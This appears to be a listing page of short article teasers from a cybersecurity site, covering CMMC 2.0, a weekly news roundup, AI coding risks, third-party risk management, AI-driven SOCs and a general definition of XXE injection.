The Cybersecurity Maturity Model Certification (CMMC) 2.0 is the U.S. Department of Defense (DoD)’s updated cybersecurity compliance framework and an evolution of CMMC 1.0.
Let’s catch up on the more interesting vulnerability disclosures and cyber security news gathered from articles across the web this week. This is what we have been reading about on our coffee break! Another shop falls to the hackers but this time just the usual password stuffing. People, sort your passwords out.
It’s no secret that the software development life cycle is becoming more complex. With a plethora of libraries, frameworks, and now AI coding agents and assistants, we can build far more ambitious software in a fraction of the time. This is fantastic! But with it come greater opportunities for accidental or malicious security bugs and vulnerabilities to sneak in undetected, with potentially devastating consequences for your users and their trust in your company.
A decade ago, the primary focus of TPRM was questionnaire management and distribution, usually done in a simple and manual way, relying on vendors to self-report on their security practices. Today the basic best practices of TPRM have grown to include continuous monitoring and other advanced AI-based capabilities like CVE alerting for third parties as elementary aspects of an effective program.
•The brutal truth about cybersecurity work: Analysts spend their days chasing 99% false positive alerts instead of doing meaningful security work. Grant Oviatt reveals why security professionals didn't get into the field to send Slack messages asking if someone is "supposed to be traveling to Mexico today." This is why AI agents are becoming essential - to let security pros focus on what they actually signed up for!
“With AI, everything changes daily. You can’t secure what constantly evolves.” Ante Gojsalić on why AI security needs continuous testing, not outdated pentests.
XML external entity injection or XXE, is a type of web security vulnerability and an application-layer cybersecurity attack. This vulnerability allows the hacker to interfere with an application while it is processing XML data. The attacker can inject unsafe XML entities into the application and can interact with systems to which the application has access. The hackers can also view files on the server and even perform remote code execution (RCE).
AI-powered SOC platforms are revolutionizing cybersecurity by dramatically reducing false positives and enabling analysts to focus on high-value security work. In this episode of Data Security Decoded, join Caleb Tolin as he sits down with Grant Oviatt, Head of Security Operations at Prophet Security, to explore how AI agents are transforming security operations centers (SOCs) and reshaping the future of cyber defense.